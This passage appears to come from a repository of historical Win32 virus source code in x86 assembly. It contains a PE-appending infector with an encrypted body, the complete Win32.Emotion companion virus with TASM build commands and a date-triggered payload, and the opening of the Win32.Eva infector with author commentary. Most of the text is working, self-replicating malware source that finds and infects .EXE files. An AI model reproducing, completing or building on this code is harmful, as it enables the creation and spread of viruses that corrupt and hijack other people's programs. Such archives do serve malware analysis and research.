LEA EAX, [EBP+(Payload_Title-START)]
PUSH EAX
LEA EAX, [EBP+(Payload_Text-START)]
PUSH EAX
PUSH 0
CALL EBX
DEC EAX ; They're disrespecting us
DEC EAX ; by clicking on Cancel?
JZ Show_Our_Box ; Then just repeat all.
Restore_SEH: XOR EAX, EAX
POP DWORD PTR FS:[EAX] ; Restore original SEH.
POP EAX ; Trash handler-address.
Execute_Host: POPAD ; Restore registers & flags.
POPFD
RET ; RETurn to our host.
Payload_Title DB 'http://www.drrling.se', 0
Payload_Text DB 'THIS IS A DEDICATION TO THE BEST MAGAZINE '
DB 'IN SWEDEN, DARLING. - IR IN ''99', 0
Infect_Directory:
PUSHAD
; Clear infection-counter.
AND BYTE PTR [EBP+(Infect_Counter-START)], 0
LEA EAX, [EBP+(Search_Record-START)]
PUSH EAX
LEA EAX, [EBP+(Search_Mask-START)]
PUSH EAX
CALL [EBP+(FindFirstFileA-START)]
MOV ESI, EAX ; Save search-handle in ESI.
INC EAX
JZ Exit_Inf_Dir
Infect_Loop: PUSHAD
LEA EBX, [EBP+(Search_Record.Find_File_Name-START)]
MOV ESI, EBX
CLD
Find_End_Name: LODSB ; Get next byte of filename.
OR AL, AL ; Found end of the ASCIIZ ?
JNZ Find_End_Name
MOV EAX, [ESI-5] ; Get extension DWORD.
CALL Upcase_EAX
CMP EAX, 'EXE.' ; Standard .EXE-file?
JE Extension_OK
CMP EAX, 'RCS.' ; Screensaver?
JNE Exit_Infect
Extension_OK: PUSH EBX
CALL [EBP+(GetFileAttributesA-START)]
CMP EAX, -1 ; Error occurred?
JE Exit_Infect
MOV ESI, EAX
AND AL, NOT 00000001b ; Get rid of readonly-flag.
PUSH EAX
PUSH EBX
CALL [EBP+(SetFileAttributesA-START)]
DEC EAX ; Error occurred?
JNZ Exit_Infect
PUSH ESI ; PUSH filename + attributes
PUSH EBX ; for Restore_Attr.
PUSH EAX ; Open candidate-file.
PUSH EAX
PUSH 3 ; Open existing.
PUSH EAX
PUSH EAX
PUSH 80000000h OR 40000000h ; Read/write-access.
PUSH EBX
CALL [EBP+(CreateFileA-START)]
MOV [EBP+(File_Handle-START)], EAX
MOV ESI, EAX
INC EAX ; Error occurred?
JZ Restore_Attr
PUSH ESI ; For CloseHandle.
PUSH 0 ; Get candidate's filesize.
PUSH ESI
CALL [EBP+(GetFileSize-START)]
CMP EAX, Min_Size_Infect ; File too small?
JB Close_Handle
LEA EAX, [EBP+(Time_Last_Write-START)]
PUSH EAX ; Get filedates & times.
SUB EAX, 8
PUSH EAX
SUB EAX, 8
PUSH EAX
PUSH ESI
CALL [EBP+(GetFileTime-START)]
; Read the MZ-header.
Read_Header: LEA EBX, [EBP+(Header-START)]
PUSH 40h
POP ECX
CALL Read_File
JNZ Close_Handle
CMP [EBX.EXE_Mark], 'ZM' ; It must be a true EXE-file.
JNE Close_Handle
CMP [EBX.Reloc_Table], 40h ; Contains a new EXE-header?
JB Close_Handle
MOV ESI, [EBX+3Ch]
MOV EAX, ESI ; Seek to PE-header.
CALL Seek_File
JZ Close_Handle
PUSH 92 ; Read-in the PE-header.
POP ECX
CALL Read_File
JNZ Close_Handle
CMP [EBX.PE_Mark], 'EP' ; Verify it's a PE-header.
JNE Close_Handle
; Program is executable?
TEST BYTE PTR [EBX.PE_Flags], 00000010b
JZ Close_Handle
; Don't infect DLL's.
TEST BYTE PTR [EBX.PE_Flags+1], 00100000b
JNZ Close_Handle
CMP [EBX.CPU_Type], 14Ch ; Must be a 386+ file.
JNE Close_Handle
; Is it already infected?
CMP [EBX.Checksum], 93FB2AA7h
JE Close_Handle
PUSH ESI
; Calculate position of the last section-header.
MOVZX EAX, [EBX.Number_Of_Sections]
DEC AX
PUSH 40
POP ECX
MUL ECX
; Calculate size of PE-header.
MOV DX, [EBX.NT_Header_Size]
ADD DX, 24
LEA ECX, [ESI+EDX] ; Start section-headers.
ADD EAX, ECX ; EAX = last section-header.
PUSH EAX
; Seek to last section-header.
CALL Seek_File
LEA ESI, [EBP+(Last_Section_Header-START)]
PUSH EBX
MOV EBX, ESI ; Read last section-header.
PUSH 40
POP ECX
CALL Read_File
POP EBX
MOV EAX, [ESI.Section_RVA]
ADD EAX, [ESI.Section_Physical_Size]
MOV [EBP+(Base_Displ-START)], EAX
XCHG [EBX.EIP_RVA], EAX
MOV [EBP+(Old_EIP_RVA-START)], EAX
; Seek to the end of the section.
MOV EAX, [ESI.Section_Physical_Offset]
ADD EAX, [ESI.Section_Physical_Size]
CALL Seek_File
MOV EAX, [ESI.Section_Physical_Size]
ADD EAX, Virus_Size
MOV ECX, [EBX.File_Align]
CALL Align_EAX
MOV [ESI.Section_Physical_Size], EAX
XCHG EDI, EAX ; Save physical-size in EDI.
MOV EAX, [ESI.Section_Virtual_Size]
MOV ECX, [EBX.Object_Align]
CALL Align_EAX
SUB [EBX.Image_Size], EAX
ADD EAX, Virus_Size_Mem - 1
Calc_Mem_Size: INC EAX
CALL Align_EAX
CMP EAX, EDI ; Virtual-size may not be
JB Calc_Mem_Size ; smaller than physical-size.
MOV [ESI.Section_Virtual_Size], EAX
ADD [EBX.Image_Size], EAX
; Set section-flags: read, write, executable, & code.
OR [ESI.Section_Flags], 11100000000000000000000000100000b
LEA EDI, [EBP+(Buffer-START)]
PUSHAD
; Get a random slide-key.
CALL [EBP+(GetTickCount-START)]
MOV [EBP+(Init_Slide-START)], EAX
XCHG EBX, EAX
; Get a random encryption-key.
CALL [EBP+(GetTickCount-START)]
MOV [EBP+(Init_Key-START)], EAX
MOV ESI, EBP
MOV ECX, (Virus_Size / 4)
CLD
REP MOVSD
MOV ECX, (Virus_End-Encrypted) / 4
Encrypt_DWORD: SUB EDI, 4
XOR [EDI], EAX
ADD EAX, EBX
RCL EBX, 3
LOOP Encrypt_DWORD
POPAD
MOV EDX, EDI ; Write virusbody to end
MOV ECX, Virus_Size ; of the last section.
CALL Write_File
POP EAX ; Offset last object-header.
CALL Seek_File
; Write updated section-header back to file.
PUSH 40
POP ECX
LEA EDX, [EBP+(Last_Section_Header-START)]
CALL Write_File
; Seek to end of file.
PUSH 2
PUSH EAX
PUSH EAX
PUSH DWORD PTR [EBP+(File_Handle-START)]
CALL [EBP+(SetFilePointer-START)]
XOR EDX, EDX ; Zero-pad the infected file.
MOV EDI, [EBX.File_Align]
DIV EDI
OR EDX, EDX ; File is already aligned?
JZ Mark_Inf_File
SUB EDI, EDX ; Howmany bytes to pad?
Zero_Pad: PUSH 1 ; Write a padding-byte.
POP ECX
LEA EDX, [EBP+(Zero_Tolerance-START)]
CALL Write_File
DEC EDI ; We've did 'em all?
JNZ Zero_Pad
Mark_Inf_File: MOV [EBX.Checksum], 93FB2AA7h
POP EAX ; Seek to start of PE-header.
CALL Seek_File
PUSH 92 ; Write updated PE-header.
POP ECX
MOV EDX, EBX
CALL Write_File
; Increment our infection-counter.
INC BYTE PTR [EBP+(Infect_Counter-START)]
; Restore original file-dates & times.
Restore_Stamp: LEA EAX, [EBP+(Time_Last_Write-START)]
PUSH EAX
SUB EAX, 8
PUSH EAX
SUB EAX, 8
PUSH EAX
PUSH DWORD PTR [EBP+(File_Handle-START)]
CALL [EBP+(SetFileTime-START)]
Close_Handle: CALL [EBP+(CloseHandle-START)]
Restore_Attr: CALL [EBP+(SetFileAttributesA-START)]
Exit_Infect: POPAD
; We've did enough infections?
CMP BYTE PTR [EBP+(Infect_Counter-START)], Max_Infect
JNB Close_Find
; Find another file.
LEA EAX, [EBP+(Search_Record-START)]
PUSH EAX
PUSH ESI
CALL [EBP+(FindNextFileA-START)]
DEC EAX ; Continue if search went OK.
JZ Infect_Loop
Close_Find: PUSH ESI ; Close search-handle.
CALL [EBP+(FindClose-START)]
Exit_Inf_Dir: POPAD
RET
; EAX = Offset.
; Returns ZF if error.
Seek_File:
PUSH 0
PUSH 0
PUSH EAX
PUSH DWORD PTR [EBP+(File_Handle-START)]
CALL [EBP+(SetFilePointer-START)]
INC EAX
RET
; EBX = Buffer.
; ECX = Bytes to read.
; Returns ZF if successful.
Read_File:
PUSH 0
LEA EAX, [EBP+(Bytes_Read-START)]
PUSH EAX
PUSH ECX
PUSH EBX
PUSH DWORD PTR [EBP+(File_Handle-START)]
CALL [EBP+(ReadFile-START)]
DEC EAX
RET
; ECX = Amount of bytes.
; EDX = Buffer.
; Returns ZF if successful.
Write_File:
PUSH 0
LEA EAX, [EBP+(Bytes_Read-START)]
PUSH EAX
PUSH ECX
PUSH EDX
PUSH 12345678h
File_Handle = DWORD PTR $-4
CALL [EBP+(WriteFile-START)]
DEC EAX
RET
Align_EAX:
XOR EDX, EDX
DIV ECX
OR EDX, EDX ; Even division?
JZ No_Round ; Then no need to round-up.
INC EAX ; Round-up.
No_Round: MUL ECX
RET
Upcase_EAX:
ROL EAX, 8
CALL Upcase_AL
ROL EAX, 8
CALL Upcase_AL
ROL EAX, 8
CALL Upcase_AL
ROL EAX, 8
Upcase_AL: CMP AL, 'a'
JB Exit_Upcase_AL
CMP AL, 'z'
JA Exit_Upcase_AL
SUB AL, 'a' - 'A'
Exit_Upcase_AL: RET
IF Debug_Mode
Search_Mask DB 'DUM?.*', 0
ELSE
Search_Mask DB '*.*', 0
ENDIF
USER32_Name DB 'USER32', 0
MessageBoxA_Name DB 'MessageBoxA', 0
GetProcAddress_Name DB 'GetProcAddress', 0
API_Names: DB 'GetCurrentDirectoryA', 0
DB 'SetCurrentDirectoryA', 0
DB 'GetWindowsDirectoryA', 0
DB 'GetSystemDirectoryA', 0
DB 'FindFirstFileA', 0
DB 'FindNextFileA', 0
DB 'FindClose', 0
DB 'GetFileAttributesA', 0
DB 'SetFileAttributesA', 0
DB 'CreateFileA', 0
DB 'CloseHandle', 0
DB 'GetFileTime', 0
DB 'SetFileTime', 0
DB 'GetFileSize', 0
DB 'SetFilePointer', 0
DB 'ReadFile', 0
DB 'WriteFile', 0
DB 'GetModuleHandleA', 0
DB 'GetTickCount', 0
Zero_Tolerance DB 0
IF (($-START) MOD 4) GT 0
DB (4 - (($-START) MOD 4)) DUP(0)
ENDIF
Virus_End:
API_Addresses:
; === Our needed API from KERNEL32.DLL. ===
GetCurrentDirectoryA DD 0
SetCurrentDirectoryA DD 0
GetWindowsDirectoryA DD 0
GetSystemDirectoryA DD 0
FindFirstFileA DD 0
FindNextFileA DD 0
FindClose DD 0
GetFileAttributesA DD 0
SetFileAttributesA DD 0
CreateFileA DD 0
CloseHandle DD 0
GetFileTime DD 0
SetFileTime DD 0
GetFileSize DD 0
SetFilePointer DD 0
ReadFile DD 0
WriteFile DD 0
GetModuleHandleA DD 0
GetTickCount DD 0
GetProcAddress DD 0
Time_Creation DD 0, 0
Time_Last_Access DD 0, 0
Time_Last_Write DD 0, 0
Infect_Counter DB 0
Bytes_Read DD 0
Header DB 92 DUP(0)
Last_Section_Header DB 40 DUP(0)
Search_Record DB 318 DUP(0)
Current_Directory DB 260 DUP(0)
Windows_Directory DB 260 DUP(0)
System_Directory DB 260 DUP(0)
Buffer DB Virus_Size DUP(0)
Virus_End_Mem:
Carrier:
PUSH 0 ; Terminate current process.
CALL ExitProcess
;---------------------- SOME USED STRUCTURES --------------------------------
EXE_Header STRUC
EXE_Mark DW 0 ; MZ-marker (MZ or ZM).
Image_Mod_512 DW 0
Image_512_Pages DW 0
Reloc_Items DW 0
Header_Size_Mem DW 0
Min_Size_Mem DW 0
Max_Size_Mem DW 0
Program_SS DW 0
Program_SP DW 0
MZ_Checksum DW 0
Program_IP DW 0
Program_CS DW 0
Reloc_Table DW 0
EXE_Header ENDS
PE_Header STRUC
PE_Mark DD 0 ; PE-marker (PE/0/0).
CPU_Type DW 0 ; Minimal CPU required.
Number_Of_Sections DW 0 ; Number of sections in PE.
DD 0
Reserved_1 DD 0
DD 0
NT_Header_Size DW 0
PE_Flags DW 0
DD 4 DUP(0)
EIP_RVA DD 0
DD 2 DUP(0)
Image_Base DD 0
Object_Align DD 0
File_Align DD 0
DW 0, 0
DW 0, 0
DW 0, 0
DD 0
Image_Size DD 0
DD 0
Checksum DD 0
PE_Header ENDS
Section_Header STRUC
Section_Name DB 8 DUP(0) ; Zero-padded section-name.
Section_Virtual_Size DD 0 ; Memory-size of section.
Section_RVA DD 0 ; Start section in memory.
Section_Physical_Size DD 0 ; Section-size in file.
Section_Physical_Offset DD 0 ; Section file-offset.
Section_Reserved_1 DD 0 ; Not used for executables.
Section_Reserved_2 DD 0 ; Not used for executables.
Section_Reserved_3 DD 0 ; Not used for executables.
Section_Flags DD 0 ; Flags of the section.
Section_Header ENDS
Find_First_Next_Win32 STRUC
File_Attributes DD 0
Creation_Time DD 0, 0
Last_Accessed_Time DD 0, 0
Last_Written_Time DD 0, 0
Find_File_Size_High DD 0
Find_File_Size_Low DD 0
Find_Reserved_1 DD 0
Find_Reserved_2 DD 0
Find_File_Name DB 260 DUP(0)
Find_DOS_File_Name DB 14 DUP(0)
Find_First_Next_Win32 ENDS
END START
Win32/Infector/Win32.Demiurg.asm
+3633
View File
File diff suppressed because it is too large Load Diff
Win32/Infector/Win32.Dengue.asm
+7158
View File
File diff suppressed because it is too large Load Diff
Win32/Infector/Win32.Diablerie.asm
+1458
View File
File diff suppressed because it is too large Load Diff
Win32/Infector/Win32.Dream.asm
+1844
View File
File diff suppressed because it is too large Load Diff
Win32/Infector/Win32.Efishnc.asm
+3420
View File
File diff suppressed because it is too large Load Diff
Win32/Infector/Win32.Efishnc.b.asm
+2817
View File
File diff suppressed because it is too large Load Diff
Win32/Infector/Win32.Efishnc.c.asm
+2852
View File
File diff suppressed because it is too large Load Diff
Win32/Infector/Win32.Egypt.asm
+2467
View File
File diff suppressed because it is too large Load Diff
Win32/Infector/Win32.Elkern.c.asm
+2579
View File
File diff suppressed because it is too large Load Diff
Win32/Infector/Win32.Emotion.asm
+267
View File
@@ -0,0 +1,267 @@
comment *
Win32.Emotion ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ
Disassembly by ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ
Darkman/29A ÜÜÜÛÛß ßÛÛÛÛÛÛ ÛÛÛÛÛÛÛ
ÛÛÛÜÜÜÜ ÜÜÜÜÛÛÛ ÛÛÛ ÛÛÛ
ÛÛÛÛÛÛÛ ÛÛÛÛÛÛß ÛÛÛ ÛÛÛ
Win32.Emotion is a 4608 bytes direct action companion EXE virus. Infects
every file in current directory and Windows directory, when executed, by
moving the original EXE file to a BIN file by the same name and overwriting
the original EXE file with the virus.
Compile Win32.Emotion with Turbo Assembler v 5.0 by typing:
TASM32 /M /ML EMOTION.ASM
TLINK32 -Tpe -x -aa EMOTION.OBJ,,, IMPORT32
VGALIGN EMOTION.EXE
PEWRSEC EMOTION.EXE
*
jumps
locals
.386
.model flat
; KERNEL32.dll
extrn ExitProcess:proc
extrn GetModuleHandleA:proc
extrn FindNextFileA:proc
extrn GetCommandLineA:proc
extrn FindFirstFileA:proc
extrn CopyFileA:proc
extrn GetSystemTime:proc
extrn GetWindowsDirectoryA:proc
extrn MoveFileA:proc
extrn SetCurrentDirectoryA:proc
extrn WinExec:proc
extrn GetModuleFileNameA:proc
; USER32.dll
extrn SwapMouseButton:proc
extrn MessageBoxA:proc
.data
MAX_PATH equ 104h
NULL equ 00h
TRUE equ 01h
MB_ICONHAND equ 10h ; A stop-sign icon appears in the
; message box
SW_SHOWNORMAL equ 01h ; Activates and displays a window
INVALID_HANDLE_VALUE equ -01h
FALSE equ 00h
SYSTEMTIME struct
wYear WORD ? ; Specifies the current year
wMonth WORD ? ; Specifies the current month;
; January = 1, February = 2, and so on
wDayOfWeek WORD ? ; Specifies the current day of the
; week
wDay WORD ? ; Specifies the current day of the
; month
wHour WORD ? ; Specifies the current hour
wMinute WORD ? ; Specifies the current minute
wSecond WORD ? ; Specifies the current second
wMilliseconds WORD ? ; Specifies the current millisecond
ends
FILETIME struct
dwLowDateTime DWORD ? ; Specifies the low-order 32 bits of
; the file time
dwHighDateTime DWORD ? ; Specifies the high-order 32 bits of
; the file time
FILETIME ends
WIN32_FIND_DATA struct
dwFileAttributes DWORD ? ; Specifies the file attributes of the
; file found
ftCreationTime FILETIME <> ; Specifies the time the file was
; created
ftLastAccessTime FILETIME <> ; Specifies the time that the file was
; last accessed
ftLastWriteTime FILETIME <> ; Specifies the time that the file was
; last written to
nFileSizeHigh DWORD ? ; Specifies the high-order DWORD value
; of the file size, in bytes
nFileSizeLow DWORD ? ; Specifies the low-order DWORD value
; of the file size, in bytes
dwReserved0 DWORD ? ; Reserved for future use
dwReserved1 DWORD ? ; Reserved for future use
cFileName BYTE MAX_PATH dup(?)
; A null-terminated string that is the
; name of the file
cAlternate BYTE 0eh dup(?) ; A null-terminated string that is an
; alternative name for the file
ends
db ?
.code
code_begin:
push NULL ; Get module handle of KERNEL32.dll
call GetModuleHandleA
push MAX_PATH ; Size of buffer, in characters
push offset cFilename ; Pointer to buffer for module path
push eax ; Handle to module to find filename
; for
call GetModuleFileNameA
jmp _FindFirstFileA
_GetWindowsDirectoryA:
push MAX_PATH ; Size of directory buffer
push offset cBuffer ; Address of buffer for Windows
; directory
call GetWindowsDirectoryA
push offset szCurDir ; Address of name of new current
; directory
call SetCurrentDirectoryA
mov [set_current_directory],TRUE
jmp _FindFirstFileA
_GetCommandLineA:
call GetCommandLineA
mov esi,eax ; ESI = pointer to the command-line
; string for the current process
lea edi,szCmdLine ; EDI = pointer to szCmdLine
move_commandline_loop:
stosb ; Store a byte of command-line
lodsb ; AL = a byte of command-line
or al,al ; End of command-line?
jnz move_commandline_loop ; Not zero? Jump to
; move_commandline_loop
mov eax,'.' ; Dot
lea edi,szCmdLine ; EDI = pointer to szCmdLine
mov ecx,MAX_PATH ; ECX = size of directory buffer
repne scasb ; Find the dot in the filename
mov dword ptr [edi],' nib' ; Change the extention of the filename
; to .BIN
mov word ptr [szCmdLine],' '
push offset SystemTime ; Address of system time structure
call GetSystemTime
cmp byte ptr [SystemTime.wMonth],05h
jne _WinExec ; May? Jump to _WinExec
cmp byte ptr [SystemTime.wDay],0dh
jne _WinExec ; 13th of May? Jump to _WinExec
push MB_ICONHAND ; A stop-sign icon appears in the
; message box
push offset szCaption ; Address of title of message box
push offset szText ; Address of text in message box
push NULL ; Message box has no owner window
call MessageBoxA
push TRUE ; Reverse buttons
call SwapMouseButton
_WinExec:
push SW_SHOWNORMAL ; Activates and displays a window
push offset szCmdLine ; Address of command-line
call WinExec
push 00h ; Exit code for all threads
call ExitProcess
_FindFirstFileA:
push offset FindFileData ; Address of returned information
push offset szFileName ; Address of name of file to search
; for
call FindFirstFileA
cmp eax,INVALID_HANDLE_VALUE
je function_failed ; Function failed? Jump to
; function_failed
lea edi,FindFileData ; EDI = pointer to FindFileData
lea esi,[edi+cFileName-WIN32_FIND_DATA]
push eax ; EAX = search handle
jmp move_filename
_FindNextFileA:
push edi ; EDI = pointer to FindFileData
lea edi,[edi+cFileName-WIN32_FIND_DATA]
mov ecx,0dh ; Store thirteen zeros
xor al,al ; Zero AL
rep stosb ; Store zero
lea edi,szNewFileName ; EDI = pointer to szNewFileName
mov ecx,0dh ; Store thirteen zeros
xor al,al ; Zero AL
rep stosb ; Store zero
pop edi ; EDI = pointer to FindFileData
pop eax ; EAX = search handle
push eax ; EAX = search handle
push edi ; Address of structure for data on
; found file
push eax ; Handle of search
call FindNextFileA
or eax,eax ; Function failed?
jz function_failed ; Zero? Jump to function_failed
lea edi,FindFileData ; EDI = pointer to FindFileData
lea esi,[edi+cFileName-WIN32_FIND_DATA]
jmp move_filename
function_failed:
cmp [set_current_directory],TRUE
je _GetCommandLineA ; Equal? Jump to _GetCommandLineA
jmp _GetWindowsDirectoryA
move_filename:
push edi ; EDI = pointer to FindFileData
lea si,[edi+cFileName-WIN32_FIND_DATA]
lea edi,szNewFileName ; EDI = pointer to szNewFileName
move_filename_loop:
lodsb ; AL = a byte of command-line
stosb ; Store a byte of command-line
or al,al ; End of command-line?
jnz move_filename_loop ; Not zero? Jump to move_filename_loop
xor eax,eax ; Zero EAX
lea edi,szNewFileName ; EDI = pointer to szNewFileName
mov ecx,41h ; Search through sixty-five characters
repne scasb ; Find end of filename
mov dword ptr [edi-04h],'nib'
pop edi ; EDI = pointer to FindFileData
push offset szNewFileName ; Address of new name for the file
lea eax,[edi+cFileName-WIN32_FIND_DATA]
push eax ; Address of name of the existing file
call MoveFileA
push FALSE ; If file already exists, overwrite it
lea eax,[edi+cFileName-WIN32_FIND_DATA]
push eax ; Address of filename to copy to
lea eax,szExistingFileName ; EAX = pointer to szExistingFileName
push eax ; Address of name of an existing file
call CopyFileA
jmp _FindNextFileA
code_end:
szFileName db '*.EXE',00h ; Name of file to search for
szCaption db 'w32.Emotion - By: Techno Phunk [TI]',00h
szText db 'A pool of emotions, beaten and abused.',0dh,0ah
db 'Who will swim in the stale waters? Not a one',0dh,0ah
db 'But many will scoff and destroy this pool with apathy',00h
szCurDir:
cBuffer db MAX_PATH dup(00h)
; Buffer for Windows directory
szNewFileName db MAX_PATH dup(00h)
; New name for the file
szExistingFileName:
szCmdLine:
cFilename db MAX_PATH dup(00h)
; Buffer for module path
SystemTime SYSTEMTIME <>
set_current_directory db FALSE
FindFileData WIN32_FIND_DATA <>
data_end:
end code_begin
Win32/Infector/Win32.Enumero.asm
+1173
View File
File diff suppressed because it is too large Load Diff
Win32/Infector/Win32.Eva.asm
+686
View File
@@ -0,0 +1,686 @@
;Win32.Eva virus.
;(c) 1999 by Benny
;
;
;Author's description
;---------------------
;
;Let me introduce my first COMPLETE Win32 infector. Yeah, i have written several parts
;of viruses, but this babe is my tiniest one with all needed functions to spread out.
;Win32.Eva is simple appender, infects one EXE file by changing pointer at 3ch
;in the MZ header, which points to new exe. After infection, MZ_lfanew pointer will be
;pointing to the viruses new PE header. So, if u will execute infected program under Win9X,
;WinNT or under Win3.1x with Win32s subsystem, program will start at the new location.
;After virus will be done with his work executes program again with changed
;MZ_lfanew pointer, that will be pointing to the original PE header.
;
;
;Payload
;--------
;
;On February the 2nd will display message box with some stupid comments.
;
;
;To build
;---------
;
;tasm32 -ml -m5 -q eva.asm
;tlink32 -Tpe -c -x -aa -r eva,,, import32
;pewrsec eva.exe (thanx Jacky !)
;
;
;AVP's description
;------------------
;
;This is a direct action (nonmemory resident) parasitic Win32 infector. It
;searches for PE EXE files in the Windows, Windows system [* Benny's note: it
;DOESN'T infect files in Windows/System directory!] and current directories,
;then writes itself to the end of the file. While infecting the virus does not
;modify the PE header at all, the infection way is based only on DOS Stub
;header: the virus writes to there new file offset of PE header (virus PE
;header). As a result the infected file has three parts: first part is original
;DOS stub, the second part is host PE data (not modified), third part is virus
;code and data.
;
;The virus has PE file structure: it contains PE header, section headers, import
;table, code and data sections. The modified DOS stub in infected files points
;to virus PE header instead of original ones. As a result, Windows32 while
;executing infected files reads and runs virus code instead of host one.
;
;To return to the host program the virus creates a copy of the infected file,
;disinfects it (just restores file offset of PE header) and spawns.
;
;On February 2nd the virus displays the message window:
;
; Win32.Eva by Benny, (c) 1999
; Hello stupid user, i'm so sorry, but i have to interrupt your work,
; 'cause I hate this shitty program. Click OK to continue.
;
; Greets to:
; Super/29A
; Darkman/29A
; Jacky Qwerty/29A
; Billy Belcebu/DDT
; and many other 29Aers...
;
;
;Some greets
;------------
;
;All 29Aers.... And thats only the beginnin' :-)
;Super/29A..... However, blue screen is still the best Sexy's effect :-)
;
;
;Who is Eva ?
;-------------------------
;
;Eva is one pretty girl with nice black/red hair and lovely eyes.
;I hope, that this work (fully programmed and commented by three days - good
;motivation :-)) will say some words to Eva better than I X-DD. I hate myself.
;
;
;Last notes
;-----------
;
;This virus has many bugs (after many repairs without tests) and in this time, I don't care
;about it. Don't bitch if, that it doesn't work and look at my last viruses... Hey, it's my first
;virus, so gimme space for living X-D.
;
;
;And here is it...
.386p ;386 instructions
.model flat ;32bit offset, no segments
include PE.inc ;include some needed files
include MZ.inc
include Useful.inc
include win32api.inc
extrn FindFirstFileA:PROC ;and import needed APIs
extrn SetFileAttributesA:PROC
extrn CreateFileA:PROC
extrn CreateFileMappingA:PROC
extrn MapViewOfFile:PROC
extrn UnmapViewOfFile:PROC
extrn CloseHandle:PROC
extrn FindClose:PROC
extrn FindNextFileA:PROC
extrn CopyFileA:PROC
extrn GetCommandLineA:PROC
extrn CreateProcessA:PROC
extrn GetModuleFileNameA:PROC
extrn WaitForSingleObject:PROC
extrn DeleteFileA:PROC
extrn GetCurrentDirectoryA:PROC
extrn GetWindowsDirectoryA:PROC
extrn GetSystemDirectoryA:PROC
extrn GetVersion:PROC
extrn GetSystemTime:PROC
extrn MessageBoxA:PROC
extrn GetLastError:PROC
extrn GetModuleHandleA:PROC
extrn GetProcAddress:PROC
extrn SetFilePointer:PROC
extrn SetEndOfFile:PROC
.data ;data section
msgTitle db 'Win32.Eva by Benny, (c) 1999', 0
msgText db 'Hello stupid user, i''m so sorry, but i have to interrupt your work,', 0dh
db '''cause I hate this shitty program. Click OK to continue.', 0dh, 0dh
db 'Greets to:', 0dh
db 9, 'Super/29A', 0dh
db 9, 'Darkman/29A', 0dh
db 9, 'Jacky Qwerty/29A', 0dh
db 9, 'Billy Belcebu/DDT', 0dh, 0dh
db 9, 'and many other 29Aers...', 0dh, 0dh, 0
kernel db 'KERNEL32', 0
IsDebuggerPresent db 'IsDebuggerPresent', 0
fmask db '*.EXE',0 ;search mask
DestFile db 'aaaaeva.exe', 0 ;temporary file
org $ - 1
space db ? ;space between name and params
CmdLine db 256 - 12 dup (?) ;command line
win32_find_data WIN32_FIND_DATA ?
search_handle dd ?
hFile dd ?
hMyFile dd ?
hMapFile dd ?
hMyMapFile dd ?
lpFile dd ?
lpMyFile dd ?
lppiProcInfo: ;needed by CreateProcessA
hProcess dd ?
hThread dd ?
dwProcessID dd ?
dwThreadID dd ?
lpFileName db 256 dup (?)
lpsiStartInfo db 64 dup (?)
lpWindowsPath db 256 dup (?)
lpCurrentPath db 256 dup (?)
org lpCurrentPath
lpSystemTime db 16 dup (?) ;these variables may overlap
ends
.code ;code of virus starts here
Start:
pushad
pushad
@SEH_SetupFrame ;setup SEH frame
inc dword ptr [edx] ;bye TD32 !
db 2dh ;some prefix
seh_rs:
push 256
push offset lpFileName
push 0
call GetModuleFileNameA ;get file-name of me
test_dir: ;i wont infect files in Windows
;dir, 'cause NT could crash
;on start
mov esi, offset lpCurrentPath
push esi
push esi
push 256
call GetCurrentDirectoryA ;get current directory
pop ebx
push 256
mov edi, offset lpWindowsPath
push edi
call GetWindowsDirectoryA ;getwindows directory
N_Char: cmpsb ;compare
jpatch: jne NoMatch ;no match, jump
jne FindFile ;second jump for next test
cmp byte ptr [esi - 1], 0 ;end of string ?
jne N_Char ;no, get next char
jmp quit_to_host ;yeah, we're in Windows dir.,
;jump to host
db 68h ;some prefix
NoMatch:push 256
mov edi, offset lpWindowsPath
push edi
call GetSystemDirectoryA ;get windows system dir.
mov word ptr [jpatch], 9090h ;path first jump with NOPs,
;second will take effect
mov esi, ebx
jmp N_Char ;and test directory
db 8bh ;some prefix
FindFile:
push offset win32_find_data
push offset fmask
call FindFirstFileA ;find first file
test eax, eax
je exit_search ;no files, quit
mov search_handle, eax ;save search handle
try_infect:
cmp win32_find_data.WFD_nFileSizeHigh, 0 ;discard huge files
jne Try_Next
mov eax, [win32_find_data.WFD_nFileSizeLow]
cmp eax, 4096*4 ;discard small files
jb Try_Next
cmp eax, (64*64*512)+1 ;discard huge files
jb @1
Try_Next:
push offset win32_find_data
push [search_handle]
call FindNextFileA ;try next file
xchg eax, ecx
jecxz exit_search ;no files, quit
jmp try_infect ;try infect it
db 67h ;some prefix
@1: mov edx, offset win32_find_data.WFD_szFileName
push edx
push 0
push edx
call SetFileAttributesA ;black file attributes
pop edx
xchg eax, ecx
jecxz Try_Next ;can't set attributes, try next
call OpenFile ;open and map file
jecxz Try_Next ;cant map file, try next
call InfectFile ;infect file
cmp eax, 'EVA' ;infection OK ?
je exit_search ;no, try next
push [lpFile]
call UnmapViewOfFile ;unmap view of file
push [hMapFile]
call CloseHandle ;close file mapping object
;error, we MUST TRUNCATE FILE BACK !
push 0
push 0
push [win32_find_data.WFD_nFileSizeLow]
push [hFile]
call SetFilePointer ;set file pointer to original size
push [hFile]
call SetEndOfFile ;and truncate file
call end_OpenFile3 ;close file
jmp Try_Next ;try next file
exit_search:
call CloseFile ;close and unmap file
call MyClose ;close and unmap my file
push [win32_find_data.WFD_dwFileAttributes]
push offset win32_find_data.WFD_szFileName
call SetFileAttributesA ;set back file attributes
push [search_handle]
call FindClose ;close search handle
quit_to_host:
push offset lpSystemTime ;test for activate payload
call GetSystemTime ;get system time
push 2
pop ecx ;ecx = 2
cmp word ptr [lpSystemTime+2], cx ;is February ?
jne no_payload
cmp word ptr [lpSystemTime+6], cx ;is 2nd of February
jne no_payload
cmp word ptr [lpSystemTime+12], cx ;2 seconds ?
jne no_payload
push 1000h ;system modal window
push offset msgTitle ;title
push offset msgText ;test
push 0 ;owner - NULL
call MessageBoxA ;display bessage box
no_payload:
push 0 ;overwrite file, if exist already
push offset DestFile ;destination file
cpyf: push offset lpFileName ;source file
call CopyFileA ;copy file
test eax, eax ;error ? (disk full, for example)
jne getcommandline
call GetLastError ;get las error
cmp eax, 32 ;another process is using this file
jne exit ;unknown error, exit
push 0 ;everwrite file
mov edx, offset DestFile ;dest. file
inc dword ptr [edx] ;try generate another file
push edx
jmp cpyf ;and try to copy file again
db 8bh ;some prefix
getcommandline: ;now we will skip our filename
call GetCommandLineA ;get command line
mov esi, eax ;set source
cat: lodsb ;get char
cmp al, 0 ;no params ?
je run_prg
cmp al, '"' ;long files r written with ""s
je long_name
